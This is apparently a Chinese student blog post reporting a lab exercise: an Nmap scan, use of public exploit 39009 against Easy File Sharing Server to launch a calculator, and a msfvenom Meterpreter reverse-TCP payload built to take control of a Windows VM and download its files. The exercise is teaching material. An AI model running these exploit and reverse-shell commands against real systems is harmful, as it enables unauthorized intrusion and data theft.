复现任务A(漏洞渗透测试与Metasploit应用)

最新推荐文章于 2024-05-17 14:42:13 发布
最新推荐文章于 2024-05-17 14:42:13 发布
阅读量379 收藏
点赞数 1
文章标签: linux 网络 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61793472/article/details/127714026
版权
  1. 实验目的和要求

一、漏洞渗透测试

1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。

2、利用Nmap扫描发现靶机(Windows)运行了该服务。P99-100

3、利用该漏洞,使得靶机运行计算器。P116-119

二、Metasploit应用

1、生成主控端、被控端。

2、获得靶机(Windows)控制权。

3、下载靶机上任意一个文件。

P121-123;140-145

      2.实验步骤

一、漏洞渗透测试

1.安装一个windows虚拟机,用他来当做靶机。

2.为了将easy file sharing 拖动到靶机中进行安装,需要在虚拟机安装VMware Tools,一直点next即可。

 

3.把下载好的easy file sharing 拖动到靶机中进行安装,一直next就好。 点击try it就行。

4.回到kali虚拟机,打开Nmap功能。

使用命令:nmap -sV -A -o easy-file.txt ip 扫描

( sV 服务版本识别 -A 强力检测选项,得到更多信息  -o 将扫描结果写入文件)

5.等待几分钟后,我们扫出如下画面,我们知道靶机正在运行这些服务

6.下一步我们使用命令:searchsploit easy file sharing 查找到和easy file sharing相关的漏洞模块

 

7.使用命令:searchsploit -m 39009

 

8.利用python的一个代码脚本来写:python2 path:后面的那串 ip 80

 

9.done显示已经完成,返回windows靶机发现打开了一个计算器

二、Metasploit应用

1.在kaili 终端输入命令msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.211.128 lport=5000 -f exe -o /root/payload.exe

 

2.root目录下生成payload.exe 文件。提前关闭防火墙和杀毒软件将其拖放到靶机window10上,

然后打开它,回到kali

 

3.输入命令msfconsole启动meterpreter

 

                                            4.依次输入截图指令

 

5.使用search命令搜索指定文件并下载靶机上感兴趣的文件即可

 

复现结果:

 

如意如意按我心意,快快显灵
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
介绍Metasploit使用方法,进行各种各样的渗透测试
easy file sharing server漏洞渗透测试Metasploit应用
zzzfff__的博客
11-06 403
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。 2、利用Nmap扫描发现靶机(Windows)运行了该服务。 3、利用该漏洞,使得靶机运行计算器。
简单漏洞复现_网络渗透测试
Radiency的博客
11-23 1522
利用easy file sharing server服务漏洞;远程控制目标,生成主控端、被控端,获得靶机控制权。
复现任务A
m0_65354386的博客
11-17 232
靶机(Windows)漏洞渗透测试Metasploit应用
网络渗透测试复现任务
m0_73936732的博客
11-22 653
复现任务
漏洞渗透测试复现 easy file sharing server
m0_62659165的博客
11-22 694
漏洞渗透测试复现 easy file sharing server
metasploit中使用lnk漏洞渗透测试.doc
03-18
metasploit中使用lnk漏洞渗透测试.doc
渗透测试Metasploit
06-16
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序...
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-web渗透6.pdf 渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试...
关于Metasploit Framework与渗透测试相关知识
12-28
关于Metasploit Framework与渗透测试相关知识
网络渗透测试漏洞复现任务
m0_64229840的博客
11-21 434
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。 2、利用Nmap扫描发现靶机(Windows)运行了该服务。P99-100。3、利用该漏洞,使得靶机运行计算器。P116-119
渗透测试工具——Metasploit
热门推荐
weixin_59872639的博客
01-14 3万+
Metasplout简介 Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具。 Metasploit核心中绝大部分有Rudy实现,一小部分由汇编和C语言实现。 kali中自带Metasploit Metasploit文件结构与模块 路径: /usr/share/metasploit-framework/ config: MSF环境配置信息,数据库配置信息 data:后渗透模块的一些工具及payload,第三方小工具集合,用户字典等数据信息 doc
Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现
Zichel77的博客
10-06 2430
发现445端口打开,SMB漏洞MS17-010(永恒之蓝)正是基于445端口进行传播,因此可以加以利用。这里有各种MS17-010漏洞版本,我们根据目标系统选择编号为3的版本。Windows下IP地址为192.168.92.136。就可以看到windows7电脑中新建了这么个文件。看到WIN才说明利用成功,FAIL就是失败。使用的是nmap模块,输入命令进行扫描。开启了两台虚拟机,保证在同一网段下。两台虚拟机在同一网段,故可保持通信。我没这个病毒就不传了哈哈哈哈哈。
Metasploit基本使用及常见漏洞复现
BeatRex的博客
09-20 1481
一、数据库配置 第一次打开msf的时候会报错,显示无法连接数据库等错误信息,所以需要配置下数据库postgresql 步骤: 开启postgresql服务service postgresql start,然后查看下postgresql数据库的状态service postgresql status显示已经开启成功; 创建和初始化msf数据库msfdb init; 启动msfmsfconsol...
基于Metasploit完成Samba服务漏洞复现
linxaiomo
03-10 7576
实验环境: 靶机ip:192.168.31.182(下载链接: https://pan.baidu.com/s/1ia-DD8UPDhIkWUd2eJWoKg?pwd=cykq 提取码: cykq 复制这段内容后打开百度网盘手机App,操作更方便哦) 攻击机ip:192.168.31.166(X64) 一:主机发现 arp-scan -l #扫描同一网段下的主机 可以看到靶机的IP地址和mac地址,Vmware为虚拟机 2.漏洞扫描 nmap 192.168.31.182.
metasploit(msf)复现MS17-010(经典的永恒之蓝)SMB漏洞
zsisle的博客
07-13 2160
MS17-010漏洞:恶意代码会扫描开放445文件共享端口(SMB)的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。...
【新】Metasploit上使用RPC方式复现一个Linux提权漏洞
weixin_42324313的博客
08-29 1988
【新】Metasploit上使用RPC方式复现一个Linux提权漏洞 0x00 前言 Metasploit官方提供了API调用方式,有RPC,REST两种方式,REST方式只支持专业版使用,这里推荐使用RPC方式调用,即标准API调用。无论在免费版还是商业版的msf中,都会提供msfrpc服务,以便去远程调用。 开启服务端PRC服务 开启服务端API服务有两种方式: 【1】通过msfconsol...
Metasploit漏洞利用模块(二)
m0_55313512的博客
03-09 356
Metasploit漏洞利用模块
Linux 三十六章
最新发布
一怀明月的博客
05-17 1240
信号量 sem_init sem_destroy sem_wait sem_post 基于环形队列的CP问题 环形队列的生产者消费者模型 线程池 localtime时间戳转化 mkdir系统调用 bind绑定成员函数 懒汉饿汉单例模式 懒汉模式: 饿汉模式: 懒汉和饿汉相同点: 线程池源码实现
metasploit渗透测试
08-02
Metasploit是一个渗透测试工具,也是信息安全与渗透测试领域最大的开源项目之一。它可以帮助您查找、利用和验证漏洞,并附带了数百个已知软件漏洞的专业级漏洞攻击工具。Metasploit的设计初衷是打造成一个攻击工具开发平台。在使用Metasploit进行渗透测试时,一般可以按照以下步骤进行操作: 1. 确定漏洞:首先需要确定目标系统存在的漏洞,可以通过查找已知漏洞来进行。例如,可以使用命令"search 漏洞名称"来搜索相关模块[2]。 2. 查找模块:一旦确定了目标漏洞,可以使用Metasploit模块来进行攻击。可以使用命令"search 漏洞名称"来查找相关模块[2]。 3. 配置模块程序:在使用模块之前,需要配置相关参数,例如设置攻击载荷、设置参数等。可以使用命令"use 模块名称"来选择要使用的模块,然后使用"set 参数名称 值"来配置参数[2]。 4. 执行模块程序:配置完成后,可以使用命令"exploit"或"run"来执行模块程序,进行漏洞利用[2]。 总的来说,Metasploit是一个功能强大的渗透测试工具,可以帮助安全专业人员评估系统的安全性,并提供了丰富的漏洞攻击工具和模块,以支持渗透测试工作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

如意如意按我心意,快快显灵

您的鼓励是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值